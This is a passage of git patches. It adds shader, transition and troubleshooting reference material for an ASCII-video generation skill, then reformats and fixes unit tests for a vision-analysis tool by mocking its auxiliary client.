+```
+
+---
+
+### Noise / Grain Shaders
+
+#### Film Grain
+```python
+def sh_grain(c, amt=10):
+    """2x-downsampled film grain. Audio-reactive in dispatch (amt scaled by rms)."""
+    noise = np.random.randint(-amt, amt+1, (c.shape[0]//2, c.shape[1]//2, 1), dtype=np.int16)
+    noise = np.repeat(np.repeat(noise, 2, axis=0), 2, axis=1)[:c.shape[0], :c.shape[1]]
+    return np.clip(c.astype(np.int16) + noise, 0, 255).astype(np.uint8)
+```
+
+#### Static Noise
+```python
+def sh_static_noise(c, density=0.05, color=True):
+    """Random pixel noise overlay (TV static)."""
+    mask = np.random.random((c.shape[0]//2, c.shape[1]//2)) < density
+    mask = np.repeat(np.repeat(mask, 2, axis=0), 2, axis=1)[:c.shape[0], :c.shape[1]]
+    out = c.copy()
+    if color:
+        noise = np.random.randint(0, 256, (c.shape[0], c.shape[1], 3), dtype=np.uint8)
+    else:
+        v = np.random.randint(0, 256, (c.shape[0], c.shape[1]), dtype=np.uint8)
+        noise = np.stack([v, v, v], axis=2)
+    out[mask] = noise[mask]
+    return out
+```
+
+---
+
+### Lines / Pattern Shaders
+
+#### Scanlines
+```python
+def sh_scanlines(c, intensity=0.08, spacing=3):
+    """Darken every Nth row."""
+    m = np.ones(c.shape[0], dtype=np.float32)
+    m[::spacing] = 1.0 - intensity
+    return np.clip(c * m[:, None, None], 0, 255).astype(np.uint8)
+```
+
+#### Halftone
+```python
+def sh_halftone(c, dot_size=6):
+    """Halftone dot pattern overlay — circular dots sized by local brightness."""
+    h, w = c.shape[:2]
+    gray = c.astype(np.float32).mean(axis=2) / 255.0
+    out = np.zeros_like(c)
+    for y in range(0, h, dot_size):
+        for x in range(0, w, dot_size):
+            block = gray[y:y+dot_size, x:x+dot_size]
+            if block.size == 0: continue
+            radius = block.mean() * dot_size * 0.5
+            cy_b, cx_b = dot_size//2, dot_size//2
+            for dy in range(min(dot_size, h-y)):
+                for dx in range(min(dot_size, w-x)):
+                    if math.sqrt((dy-cy_b)**2 + (dx-cx_b)**2) < radius:
+                        out[y+dy, x+dx] = c[y+dy, x+dx]
+    return out
+```
+
+> **Performance note:** Halftone is slow due to Python loops. Acceptable for small resolutions or single test frames. For production, consider a vectorized version using precomputed distance masks.
+
+---
+
+### Tone Shaders
+
+#### Vignette
+```python
+_vig_cache = {}
+def sh_vignette(c, s=0.22):
+    """Edge darkening using cached distance field."""
+    k = (c.shape[0], c.shape[1], round(s, 2))
+    if k not in _vig_cache:
+        h, w = c.shape[:2]
+        Y = np.linspace(-1, 1, h)[:, None]; X = np.linspace(-1, 1, w)[None, :]
+        _vig_cache[k] = np.clip(1.0 - np.sqrt(X**2 + Y**2) * s, 0.15, 1).astype(np.float32)
+    return np.clip(c * _vig_cache[k][:,:,None], 0, 255).astype(np.uint8)
+```
+
+#### Contrast
+```python
+def sh_contrast(c, factor=1.3):
+    """Adjust contrast around midpoint 128."""
+    return np.clip((c.astype(np.float32) - 128) * factor + 128, 0, 255).astype(np.uint8)
+```
+
+#### Gamma
+```python
+def sh_gamma(c, gamma=1.5):
+    """Gamma correction. >1=brighter mids, <1=darker mids."""
+    return np.clip(((c.astype(np.float32)/255.0) ** (1.0/gamma)) * 255, 0, 255).astype(np.uint8)
+```
+
+#### Levels
+```python
+def sh_levels(c, black=0, white=255, midtone=1.0):
+    """Levels adjustment (Photoshop-style). Remap black/white points, apply midtone gamma."""
+    o = (c.astype(np.float32) - black) / max(1, white - black)
+    o = np.clip(o, 0, 1) ** (1.0 / midtone)
+    return (o * 255).astype(np.uint8)
+```
+
+#### Brightness
+```python
+def sh_brightness(c, factor=1.5):
+    """Global brightness multiplier. Prefer tonemap() for scene-level brightness control."""
+    return np.clip(c.astype(np.float32) * factor, 0, 255).astype(np.uint8)
+```
+
+---
+
+### Glitch / Data Shaders
+
+#### Glitch Bands
+```python
+def sh_glitch_bands(c, f):
+    """Beat-reactive horizontal row displacement. f = audio features dict.
+    Uses f["bdecay"] for intensity and f["sub"] for band height."""
+    n = int(3 + f.get("bdecay", 0) * 10)
+    out = c.copy()
+    for _ in range(n):
+        y = random.randint(0, c.shape[0]-1)
+        h = random.randint(1, max(2, int(4 + f.get("sub", 0.3) * 12)))
+        shift = int((random.random()-0.5) * f.get("bdecay", 0) * 60)
+        if shift != 0 and y+h < c.shape[0]:
+            out[y:y+h] = np.roll(out[y:y+h], shift, axis=1)
+    return out
+```
+
+#### Block Glitch
+```python
+def sh_block_glitch(c, n_blocks=8, max_size=40):
+    """Random rectangular block displacement — copy blocks to random positions."""
+    out = c.copy(); h, w = c.shape[:2]
+    for _ in range(n_blocks):
+        bw = random.randint(10, max_size); bh = random.randint(5, max_size//2)
+        sx = random.randint(0, w-bw-1); sy = random.randint(0, h-bh-1)
+        dx = random.randint(0, w-bw-1); dy = random.randint(0, h-bh-1)
+        out[dy:dy+bh, dx:dx+bw] = c[sy:sy+bh, sx:sx+bw]
+    return out
+```
+
+#### Pixel Sort
+```python
+def sh_pixel_sort(c, threshold=100, direction="h"):
+    """Sort pixels by brightness in contiguous bright regions."""
+    gray = c.astype(np.float32).mean(axis=2)
+    out = c.copy()
+    if direction == "h":
+        for y in range(0, c.shape[0], 3):  # every 3rd row for speed
+            row_bright = gray[y]
+            mask = row_bright > threshold
+            regions = np.diff(np.concatenate([[0], mask.astype(int), [0]]))
+            starts = np.where(regions == 1)[0]
+            ends = np.where(regions == -1)[0]
+            for s, e in zip(starts, ends):
+                if e - s > 2:
+                    indices = np.argsort(gray[y, s:e])
+                    out[y, s:e] = c[y, s:e][indices]
+    else:
+        for x in range(0, c.shape[1], 3):
+            col_bright = gray[:, x]
+            mask = col_bright > threshold
+            regions = np.diff(np.concatenate([[0], mask.astype(int), [0]]))
+            starts = np.where(regions == 1)[0]
+            ends = np.where(regions == -1)[0]
+            for s, e in zip(starts, ends):
+                if e - s > 2:
+                    indices = np.argsort(gray[s:e, x])
+                    out[s:e, x] = c[s:e, x][indices]
+    return out
+```
+
+#### Data Bend
+```python
+def sh_data_bend(c, offset=1000, chunk=500):
+    """Treat raw pixel bytes as data, copy a chunk to another offset — datamosh artifacts."""
+    flat = c.flatten().copy()
+    n = len(flat)
+    src = offset % n; dst = (offset + chunk*3) % n
+    length = min(chunk, n-src, n-dst)
+    if length > 0:
+        flat[dst:dst+length] = flat[src:src+length]
+    return flat.reshape(c.shape)
+```
+
+---
+
+## Tint Presets
+
+```python
+TINT_WARM      = (1.15, 1.0, 0.85)   # golden warmth
+TINT_COOL      = (0.85, 0.95, 1.15)  # blue cool
+TINT_MATRIX    = (0.7, 1.2, 0.7)     # green terminal
+TINT_AMBER     = (1.2, 0.9, 0.6)     # amber monitor
+TINT_SEPIA     = (1.2, 1.05, 0.8)    # old film
+TINT_NEON_PINK = (1.3, 0.7, 1.1)     # cyberpunk pink
+TINT_ICE       = (0.8, 1.0, 1.3)     # frozen
+TINT_BLOOD     = (1.4, 0.7, 0.7)     # horror red
+TINT_FOREST    = (0.8, 1.15, 0.75)   # natural green
+TINT_VOID      = (0.85, 0.85, 1.1)   # deep space
+TINT_SUNSET    = (1.3, 0.85, 0.7)    # orange dusk
+```
+
+---
+
+## Transitions
+
+> **Note:** These operate on character-level `(chars, colors)` arrays (v1 interface). In v2, transitions between scenes are typically handled by hard cuts at beat boundaries (see `scenes.md`), or by rendering both scenes to canvases and using `blend_canvas()` with a time-varying opacity. The character-level transitions below are still useful for within-scene effects.
+
+### Crossfade
+```python
+def tr_crossfade(ch_a, co_a, ch_b, co_b, blend):
+    co = (co_a.astype(np.float32) * (1-blend) + co_b.astype(np.float32) * blend).astype(np.uint8)
+    mask = np.random.random(ch_a.shape) < blend
+    ch = ch_a.copy(); ch[mask] = ch_b[mask]
+    return ch, co
+```
+
+### v2 Canvas-Level Crossfade
+```python
+def tr_canvas_crossfade(canvas_a, canvas_b, blend):
+    """Smooth pixel crossfade between two canvases."""
+    return np.clip(canvas_a * (1-blend) + canvas_b * blend, 0, 255).astype(np.uint8)
+```
+
+### Wipe (directional)
+```python
+def tr_wipe(ch_a, co_a, ch_b, co_b, blend, direction="left"):
+    """direction: left, right, up, down, radial, diagonal"""
+    rows, cols = ch_a.shape
+    if direction == "radial":
+        cx, cy = cols/2, rows/2
+        rr = np.arange(rows)[:, None]; cc = np.arange(cols)[None, :]
+        d = np.sqrt((cc-cx)**2 + (rr-cy)**2)
+        mask = d < blend * np.sqrt(cx**2 + cy**2)
+        ch = ch_a.copy(); co = co_a.copy()
+        ch[mask] = ch_b[mask]; co[mask] = co_b[mask]
+    return ch, co
+```
+
+### Glitch Cut
+```python
+def tr_glitch_cut(ch_a, co_a, ch_b, co_b, blend):
+    if blend < 0.5: ch, co = ch_a.copy(), co_a.copy()
+    else: ch, co = ch_b.copy(), co_b.copy()
+    if 0.3 < blend < 0.7:
+        intensity = 1.0 - abs(blend - 0.5) * 4
+        for _ in range(int(intensity * 20)):
+            y = random.randint(0, ch.shape[0]-1)
+            shift = int((random.random()-0.5) * 40 * intensity)
+            if shift: ch[y] = np.roll(ch[y], shift); co[y] = np.roll(co[y], shift, axis=0)
+    return ch, co
+```
+
+---
+
+## Output Formats
+
+### MP4 (default)
+```python
+cmd = ["ffmpeg", "-y", "-f", "rawvideo", "-pix_fmt", "rgb24",
+       "-s", f"{W}x{H}", "-r", str(fps), "-i", "pipe:0",
+       "-c:v", "libx264", "-preset", "fast", "-crf", str(crf),
+       "-pix_fmt", "yuv420p", output_path]
+```
+
+### GIF
+```python
+cmd = ["ffmpeg", "-y", "-f", "rawvideo", "-pix_fmt", "rgb24",
+       "-s", f"{W}x{H}", "-r", str(fps), "-i", "pipe:0",
+       "-vf", f"fps={fps},scale={W}:{H}:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
+       "-loop", "0", output_gif]
+```
diff --git a/skills/creative/ascii-video/references/troubleshooting.md b/skills/creative/ascii-video/references/troubleshooting.md
new file mode 100644
index 00000000..6af622c8
--- /dev/null
+++ b/skills/creative/ascii-video/references/troubleshooting.md
@@ -0,0 +1,331 @@
+# Troubleshooting Reference
+
+Common bugs, gotchas, and platform-specific issues encountered during ASCII video development.
+
+## NumPy Broadcasting
+
+### The `broadcast_to().copy()` Trap
+
+Hue field generators often return arrays that are broadcast views — they have shape `(1, cols)` or `(rows, 1)` that numpy broadcasts to `(rows, cols)`. These views are **read-only**. If any downstream code tries to modify them in-place (e.g., `h %= 1.0`), numpy raises:
+
+```
+ValueError: output array is read-only
+```
+
+**Fix**: Always `.copy()` after `broadcast_to()`:
+
+```python
+h = np.broadcast_to(h, (g.rows, g.cols)).copy()
+```
+
+This is especially important in `_render_vf()` where hue arrays flow through `hsv2rgb()`.
+
+### The `+=` vs `+` Trap
+
+Broadcasting also fails with in-place operators when operand shapes don't match exactly:
+
+```python
+# FAILS if result is (rows,1) and operand is (rows, cols)
+val += np.sin(g.cc * 0.02 + t * 0.3) * 0.5
+
+# WORKS — creates a new array
+val = val + np.sin(g.cc * 0.02 + t * 0.3) * 0.5
+```
+
+The `vf_plasma()` function had this bug. Use `+` instead of `+=` when mixing different-shaped arrays.
+
+### Shape Mismatch in `hsv2rgb()`
+
+`hsv2rgb(h, s, v)` requires all three arrays to have identical shapes. If `h` is `(1, cols)` and `s` is `(rows, cols)`, the function crashes or produces wrong output.
+
+**Fix**: Ensure all inputs are broadcast and copied to `(rows, cols)` before calling.
+
+---
+
+## Blend Mode Pitfalls
+
+### Overlay Crushes Dark Inputs
+
+`overlay(a, b) = 2*a*b` when `a < 0.5`. Two values of 0.12 produce `2 * 0.12 * 0.12 = 0.03`. The result is darker than either input.
+
+**Impact**: If both layers are dark (which ASCII art usually is), overlay produces near-black output.
+
+**Fix**: Use `screen` for dark source material. Screen always brightens: `1 - (1-a)*(1-b)`.
+
+### Colordodge Division by Zero
+
+`colordodge(a, b) = a / (1 - b)`. When `b = 1.0` (pure white pixels), this divides by zero.
+
+**Fix**: Add epsilon: `a / (1 - b + 1e-6)`. The implementation in `BLEND_MODES` should include this.
+
+### Colorburn Division by Zero
+
+`colorburn(a, b) = 1 - (1-a) / b`. When `b = 0` (pure black pixels), this divides by zero.
+
+**Fix**: Add epsilon: `1 - (1-a) / (b + 1e-6)`.
+
+### Multiply Always Darkens
+
+`multiply(a, b) = a * b`. Since both operands are [0,1], the result is always <= min(a,b). Never use multiply as a feedback blend mode — the frame goes black within a few frames.
+
+**Fix**: Use `screen` for feedback, or `add` with low opacity.
+
+---
+
+## Multiprocessing
+
+### Pickling Constraints
+
+`ProcessPoolExecutor` serializes function arguments via pickle. This constrains what you can pass to workers:
+
+| Can Pickle | Cannot Pickle |
+|-----------|---------------|
+| Module-level functions (`def fx_foo():`) | Lambdas (`lambda x: x + 1`) |
+| Dicts, lists, numpy arrays | Closures (functions defined inside functions) |
+| Class instances (with `__reduce__`) | Instance methods |
+| Strings, numbers | File handles, sockets |
+
+**Impact**: All scene functions referenced in the SCENES table must be defined at module level with `def`. If you use a lambda or closure, you get:
+
+```
+_pickle.PicklingError: Can't pickle <function <lambda> at 0x...>
+```
+
+**Fix**: Define all scene functions at module top level. Lambdas used inside `_render_vf()` as val_fn/hue_fn are fine because they execute within the worker process — they're not pickled across process boundaries.
+
+### macOS spawn vs Linux fork
+
+On macOS, `multiprocessing` defaults to `spawn` (full serialization). On Linux, it defaults to `fork` (copy-on-write). This means:
+
+- **macOS**: Feature arrays are serialized per worker (~57KB for 30s video, but scales with duration). Each worker re-imports the entire module.
+- **Linux**: Feature arrays are shared via COW. Workers inherit the parent's memory.
+
+**Impact**: On macOS, module-level code (like `detect_hardware()`) runs in every worker process. If it has side effects (e.g., subprocess calls), those happen N+1 times.
+
+### Per-Worker State Isolation
+
+Each worker creates its own:
+- `Renderer` instance (with fresh grid cache)
+- `FeedbackBuffer` (feedback doesn't cross scene boundaries)
+- Random seed (`random.seed(hash(seg_id) + 42)`)
+
+This means:
+- Particle state doesn't carry between scenes (expected)
+- Feedback trails reset at scene cuts (expected)
+- `np.random` state is NOT seeded by `random.seed()` — they use separate RNGs
+
+**Fix for deterministic noise**: Use `np.random.RandomState(seed)` explicitly:
+
+```python
+rng = np.random.RandomState(hash(seg_id) + 42)
+noise = rng.random((rows, cols))
+```
+
+---
+
+## Brightness Issues
+
+### Dark Scenes After Tonemap
+
+If a scene is still dark after tonemap, check:
+
+1. **Gamma too high**: Lower gamma (0.5-0.6) for scenes with destructive post-processing
+2. **Shader destroying brightness**: Solarize, posterize, or contrast adjustments in the shader chain can undo tonemap's work. Move destructive shaders earlier in the chain, or increase gamma to compensate.
+3. **Feedback with multiply**: Multiply feedback darkens every frame. Switch to screen or add.
+4. **Overlay blend in scene**: If the scene function uses `blend_canvas(..., "overlay", ...)` with dark layers, switch to screen.
+
+### Diagnostic: Test-Frame Brightness
+
+```bash
+python reel.py --test-frame 10.0
+# Output: Mean brightness: 44.3, max: 255
+```
+
+If mean < 20, the scene needs attention. Common fixes:
+- Lower gamma in the SCENES entry
+- Change internal blend modes from overlay/multiply to screen/add
+- Increase value field multipliers (e.g., `vf_plasma(...) * 1.5`)
+- Check that the shader chain doesn't have an aggressive solarize or threshold
+
+### v1 Brightness Pattern (Deprecated)
+
+The old pattern used a linear multiplier:
+
+```python
+# OLD — don't use
+canvas = np.clip(canvas.astype(np.float32) * 2.0, 0, 255).astype(np.uint8)
+```
+
+This fails because:
+- Dark scenes (mean 8): `8 * 2.0 = 16` — still dark
+- Bright scenes (mean 130): `130 * 2.0 = 255` — clipped, lost detail
+
+Use `tonemap()` instead. See `composition.md` § Adaptive Tone Mapping.
+
+---
+
+## ffmpeg Issues
+
+### Pipe Deadlock
+
+The #1 production bug. If you use `stderr=subprocess.PIPE`:
+
+```python
+# DEADLOCK — stderr buffer fills at 64KB, blocks ffmpeg, blocks your writes
+pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
+```
+
+**Fix**: Always redirect stderr to a file:
+
+```python
+stderr_fh = open(err_path, "w")
+pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE,
+                        stdout=subprocess.DEVNULL, stderr=stderr_fh)
+```
+
+### Frame Count Mismatch
+
+If the number of frames written to the pipe doesn't match what ffmpeg expects (based on `-r` and duration), the output may have:
+- Missing frames at the end
+- Incorrect duration
+- Audio-video desync
+
+**Fix**: Calculate frame count explicitly: `n_frames = int(duration * FPS)`. Don't use `range(int(start*FPS), int(end*FPS))` without verifying the total matches.
+
+### Concat Fails with "unsafe file name"
+
+```
+[concat @ ...] Unsafe file name
+```
+
+**Fix**: Always use `-safe 0`:
+```python
+["ffmpeg", "-f", "concat", "-safe", "0", "-i", concat_path, ...]
+```
+
+---
+
+## Font Issues
+
+### Cell Height (macOS Pillow)
+
+`textbbox()` and `getbbox()` return incorrect heights on some macOS Pillow versions. Use `getmetrics()`:
+
+```python
+ascent, descent = font.getmetrics()
+cell_height = ascent + descent  # correct
+# NOT: font.getbbox("M")[3]  # wrong on some versions
+```
+
+### Missing Unicode Glyphs
+
+Not all fonts render all Unicode characters. If a palette character isn't in the font, the glyph renders as a blank or tofu box, appearing as a dark hole in the output.
+
+**Fix**: Validate at init:
+
+```python
+all_chars = set()
+for pal in [PAL_DEFAULT, PAL_DENSE, PAL_RUNE, ...]:
+    all_chars.update(pal)
+
+valid_chars = set()
+for c in all_chars:
+    if c == " ":
+        valid_chars.add(c)
+        continue
+    img = Image.new("L", (20, 20), 0)
+    ImageDraw.Draw(img).text((0, 0), c, fill=255, font=font)
+    if np.array(img).max() > 0:
+        valid_chars.add(c)
+    else:
+        log(f"WARNING: '{c}' (U+{ord(c):04X}) missing from font")
+```
+
+### Platform Font Paths
+
+| Platform | Common Paths |
+|----------|-------------|
+| macOS | `/System/Library/Fonts/Menlo.ttc`, `/System/Library/Fonts/Monaco.ttf` |
+| Linux | `/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf` |
+| Windows | `C:\Windows\Fonts\consola.ttf` (Consolas) |
+
+Always probe multiple paths and fall back gracefully. See `architecture.md` § Font Selection.
+
+---
+
+## Performance
+
+### Slow Shaders
+
+Some shaders use Python loops and are very slow at 1080p:
+
+| Shader | Issue | Fix |
+|--------|-------|-----|
+| `wave_distort` | Per-row Python loop | Use vectorized fancy indexing |
+| `halftone` | Triple-nested loop | Vectorize with block reduction |
+| `matrix rain` | Per-column per-trail loop | Accumulate index arrays, bulk assign |
+
+### Render Time Scaling
+
+If render is taking much longer than expected:
+1. Check grid count — each extra grid adds ~100-150ms/frame for init
+2. Check particle count — cap at quality-appropriate limits
+3. Check shader count — each shader adds 2-25ms
+4. Check for accidental Python loops in effects (should be numpy only)
+
+---
+
+## Common Mistakes
+
+### Using `r.S` vs the `S` Parameter
+
+The v2 scene protocol passes `S` (the state dict) as an explicit parameter. But `S` IS `r.S` — they're the same object. Both work:
+
+```python
+def fx_scene(r, f, t, S):
+    S["counter"] = S.get("counter", 0) + 1   # via parameter (preferred)
+    r.S["counter"] = r.S.get("counter", 0) + 1  # via renderer (also works)
+```
+
+Use the `S` parameter for clarity. The explicit parameter makes it obvious that the function has persistent state.
+
+### Forgetting to Handle Empty Feature Values
+
+Audio features default to 0.0 if the audio is silent. Use `.get()` with sensible defaults:
+
+```python
+energy = f.get("bass", 0.3)  # default to 0.3, not 0
+```
+
+If you default to 0, effects go blank during silence.
+
+### Writing New Files Instead of Editing Existing State
+
+A common bug in particle systems: creating new arrays every frame instead of updating persistent state.
+
+```python
+# WRONG — particles reset every frame
+S["px"] = []
+for _ in range(100):
+    S["px"].append(random.random())
+
+# RIGHT — only initialize once, update each frame
+if "px" not in S:
+    S["px"] = []
+# ... emit new particles based on beats
+# ... update existing particles
+```
+
+### Not Clipping Value Fields
+
+Value fields should be [0, 1]. If they exceed this range, `val2char()` produces index errors:
+
+```python
+# WRONG — vf_plasma() * 1.5 can exceed 1.0
+val = vf_plasma(g, f, t, S) * 1.5
+
+# RIGHT — clip after scaling
+val = np.clip(vf_plasma(g, f, t, S) * 1.5, 0, 1)
+```
+
+The `_render_vf()` helper clips automatically, but if you're building custom scenes, clip explicitly.

From 0229e6b407c8d1c6b6fac25ed40e7b64abb9ba40 Mon Sep 17 00:00:00 2001
From: SHL0MS <131039422+SHL0MS@users.noreply.github.com>
Date: Tue, 10 Mar 2026 16:03:19 -0400
Subject: [PATCH 030/105] Fix test_analysis_error_logs_exc_info: mock
 _aux_async_client so download path is reached

---
 tests/tools/test_vision_tools.py | 112 ++++++++++++++++++++++---------
 1 file changed, 82 insertions(+), 30 deletions(-)

diff --git a/tests/tools/test_vision_tools.py b/tests/tools/test_vision_tools.py
index 3bdd3017..58fe7d61 100644
--- a/tests/tools/test_vision_tools.py
+++ b/tests/tools/test_vision_tools.py
@@ -25,6 +25,7 @@ from tools.vision_tools import (
 # _validate_image_url — urlparse-based validation
 # ---------------------------------------------------------------------------
 
+
 class TestValidateImageUrl:
     """Tests for URL validation, including urlparse-based netloc check."""
 
@@ -95,6 +96,7 @@ class TestValidateImageUrl:
 # _determine_mime_type
 # ---------------------------------------------------------------------------
 
+
 class TestDetermineMimeType:
     def test_jpg(self):
         assert _determine_mime_type(Path("photo.jpg")) == "image/jpeg"
@@ -119,6 +121,7 @@ class TestDetermineMimeType:
 # _image_to_base64_data_url
 # ---------------------------------------------------------------------------
 
+
 class TestImageToBase64DataUrl:
     def test_returns_data_url(self, tmp_path):
         img = tmp_path / "test.png"
@@ -141,15 +144,21 @@ class TestImageToBase64DataUrl:
 # _handle_vision_analyze — type signature & behavior
 # ---------------------------------------------------------------------------
 
+
 class TestHandleVisionAnalyze:
     """Verify _handle_vision_analyze returns an Awaitable and builds correct prompt."""
 
     def test_returns_awaitable(self):
         """The handler must return an Awaitable (coroutine) since it's registered as async."""
-        with patch("tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock) as mock_tool:
+        with patch(
+            "tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock
+        ) as mock_tool:
             mock_tool.return_value = json.dumps({"result": "ok"})
             result = _handle_vision_analyze(
-                {"image_url": "https://example.com/img.png", "question": "What is this?"}
+                {
+                    "image_url": "https://example.com/img.png",
+                    "question": "What is this?",
+                }
             )
             # It should be an Awaitable (coroutine)
             assert isinstance(result, Awaitable)
@@ -158,10 +167,15 @@ class TestHandleVisionAnalyze:
 
     def test_prompt_contains_question(self):
         """The full prompt should incorporate the user's question."""
-        with patch("tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock) as mock_tool:
+        with patch(
+            "tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock
+        ) as mock_tool:
             mock_tool.return_value = json.dumps({"result": "ok"})
             coro = _handle_vision_analyze(
-                {"image_url": "https://example.com/img.png", "question": "Describe the cat"}
+                {
+                    "image_url": "https://example.com/img.png",
+                    "question": "Describe the cat",
+                }
             )
             # Clean up coroutine
             coro.close()
@@ -172,8 +186,12 @@ class TestHandleVisionAnalyze:
 
     def test_uses_auxiliary_vision_model_env(self):
         """AUXILIARY_VISION_MODEL env var should override DEFAULT_VISION_MODEL."""
-        with patch("tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock) as mock_tool, \
-             patch.dict(os.environ, {"AUXILIARY_VISION_MODEL": "custom/model-v1"}):
+        with (
+            patch(
+                "tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock
+            ) as mock_tool,
+            patch.dict(os.environ, {"AUXILIARY_VISION_MODEL": "custom/model-v1"}),
+        ):
             mock_tool.return_value = json.dumps({"result": "ok"})
             coro = _handle_vision_analyze(
                 {"image_url": "https://example.com/img.png", "question": "test"}
@@ -185,8 +203,12 @@ class TestHandleVisionAnalyze:
 
     def test_falls_back_to_default_model(self):
         """Without AUXILIARY_VISION_MODEL, should use DEFAULT_VISION_MODEL or fallback."""
-        with patch("tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock) as mock_tool, \
-             patch.dict(os.environ, {}, clear=False):
+        with (
+            patch(
+                "tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock
+            ) as mock_tool,
+            patch.dict(os.environ, {}, clear=False),
+        ):
             # Ensure AUXILIARY_VISION_MODEL is not set
             os.environ.pop("AUXILIARY_VISION_MODEL", None)
             mock_tool.return_value = json.dumps({"result": "ok"})
@@ -202,7 +224,9 @@ class TestHandleVisionAnalyze:
 
     def test_empty_args_graceful(self):
         """Missing keys should default to empty strings, not raise."""
-        with patch("tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock) as mock_tool:
+        with patch(
+            "tools.vision_tools.vision_analyze_tool", new_callable=AsyncMock
+        ) as mock_tool:
             mock_tool.return_value = json.dumps({"result": "ok"})
             result = _handle_vision_analyze({})
             assert isinstance(result, Awaitable)
@@ -213,6 +237,7 @@ class TestHandleVisionAnalyze:
 # Error logging with exc_info — verify tracebacks are logged
 # ---------------------------------------------------------------------------
 
+
 class TestErrorLoggingExcInfo:
     """Verify that exc_info=True is used in error/warning log calls."""
 
@@ -229,9 +254,13 @@ class TestErrorLoggingExcInfo:
             mock_client_cls.return_value = mock_client
 
             dest = tmp_path / "image.jpg"
-            with caplog.at_level(logging.ERROR, logger="tools.vision_tools"), \
-                 pytest.raises(ConnectionError):
-                await _download_image("https://example.com/img.jpg", dest, max_retries=1)
+            with (
+                caplog.at_level(logging.ERROR, logger="tools.vision_tools"),
+                pytest.raises(ConnectionError),
+            ):
+                await _download_image(
+                    "https://example.com/img.jpg", dest, max_retries=1
+                )
 
             # Should have logged with exc_info (traceback present)
             error_records = [r for r in caplog.records if r.levelno >= logging.ERROR]
@@ -241,11 +270,17 @@ class TestErrorLoggingExcInfo:
     @pytest.mark.asyncio
     async def test_analysis_error_logs_exc_info(self, caplog):
         """When vision_analyze_tool encounters an error, it should log with exc_info."""
-        with patch("tools.vision_tools._validate_image_url", return_value=True), \
-             patch("tools.vision_tools._download_image", new_callable=AsyncMock,
-                   side_effect=Exception("download boom")), \
-             caplog.at_level(logging.ERROR, logger="tools.vision_tools"):
-
+        with (
+            patch("tools.vision_tools._validate_image_url", return_value=True),
+            patch(
+                "tools.vision_tools._download_image",
+                new_callable=AsyncMock,
+                side_effect=Exception("download boom"),
+            ),
+            patch("tools.vision_tools._aux_async_client", MagicMock()),
+            patch("tools.vision_tools.DEFAULT_VISION_MODEL", "test/model"),
+            caplog.at_level(logging.ERROR, logger="tools.vision_tools"),
+        ):
             result = await vision_analyze_tool(
                 "https://example.com/img.jpg", "describe this", "test/model"
             )
@@ -269,14 +304,20 @@ class TestErrorLoggingExcInfo:
             dest.write_bytes(b"\xff\xd8\xff" + b"\x00" * 16)
             return dest
 
-        with patch("tools.vision_tools._validate_image_url", return_value=True), \
-             patch("tools.vision_tools._download_image", side_effect=fake_download), \
-             patch("tools.vision_tools._image_to_base64_data_url",
-                   return_value="data:image/jpeg;base64,abc"), \
-             patch("agent.auxiliary_client.get_auxiliary_extra_body", return_value=None), \
-             patch("agent.auxiliary_client.auxiliary_max_tokens_param", return_value={"max_tokens": 2000}), \
-             caplog.at_level(logging.WARNING, logger="tools.vision_tools"):
-
+        with (
+            patch("tools.vision_tools._validate_image_url", return_value=True),
+            patch("tools.vision_tools._download_image", side_effect=fake_download),
+            patch(
+                "tools.vision_tools._image_to_base64_data_url",
+                return_value="data:image/jpeg;base64,abc",
+            ),
+            patch("agent.auxiliary_client.get_auxiliary_extra_body", return_value=None),
+            patch(
+                "agent.auxiliary_client.auxiliary_max_tokens_param",
+                return_value={"max_tokens": 2000},
+            ),
+            caplog.at_level(logging.WARNING, logger="tools.vision_tools"),
+        ):
             # Mock the vision client
             mock_client = AsyncMock()
             mock_response = MagicMock()
@@ -286,11 +327,13 @@ class TestErrorLoggingExcInfo:
             mock_client.chat.completions.create = AsyncMock(return_value=mock_response)
 
             # Patch module-level _aux_async_client so the tool doesn't bail early
-            with patch("tools.vision_tools._aux_async_client", mock_client), \
-                 patch("tools.vision_tools.DEFAULT_VISION_MODEL", "test/model"):
-
+            with (
+                patch("tools.vision_tools._aux_async_client", mock_client),
+                patch("tools.vision_tools.DEFAULT_VISION_MODEL", "test/model"),
+            ):
                 # Make unlink fail to trigger cleanup warning
                 original_unlink = Path.unlink
+
                 def failing_unlink(self, *args, **kwargs):
                     raise PermissionError("no permission")
 
@@ -299,8 +342,12 @@ class TestErrorLoggingExcInfo:
                         "https://example.com/tempimg.jpg", "describe", "test/model"
                     )
 
-            warning_records = [r for r in caplog.records if r.levelno == logging.WARNING
-                               and "temporary file" in r.getMessage().lower()]
+            warning_records = [
+                r
+                for r in caplog.records
+                if r.levelno == logging.WARNING
+                and "temporary file" in r.getMessage().lower()
+            ]
             assert len(warning_records) >= 1
             assert warning_records[0].exc_info is not None
 
@@ -309,6 +356,7 @@ class TestErrorLoggingExcInfo:
 # check_vision_requirements & get_debug_session_info
 # ---------------------------------------------------------------------------
 
+
 class TestVisionRequirements:
     def test_check_requirements_returns_bool(self):
         result = check_vision_requirements()
@@ -327,9 +375,11 @@ class TestVisionRequirements:
 # Integration: registry entry
 # ---------------------------------------------------------------------------
 
+
 class TestVisionRegistration:
     def test_vision_analyze_registered(self):
         from tools.registry import registry
+
         entry = registry._tools.get("vision_analyze")
         assert entry is not None
         assert entry.toolset == "vision"
@@ -337,6 +387,7 @@ class TestVisionRegistration:
 
     def test_schema_has_required_fields(self):
         from tools.registry import registry
+
         entry = registry._tools.get("vision_analyze")
         schema = entry.schema
         assert schema["name"] == "vision_analyze"
@@ -347,5 +398,6 @@ class TestVisionRegistration:
 
     def test_handler_is_callable(self):
         from tools.registry import registry
+
         entry = registry._tools.get("vision_analyze")
         assert callable(entry.handler)

From d04b9f4dc56aea18e199db62faa6b150fdb63e95 Mon Sep 17 00:00:00 2001
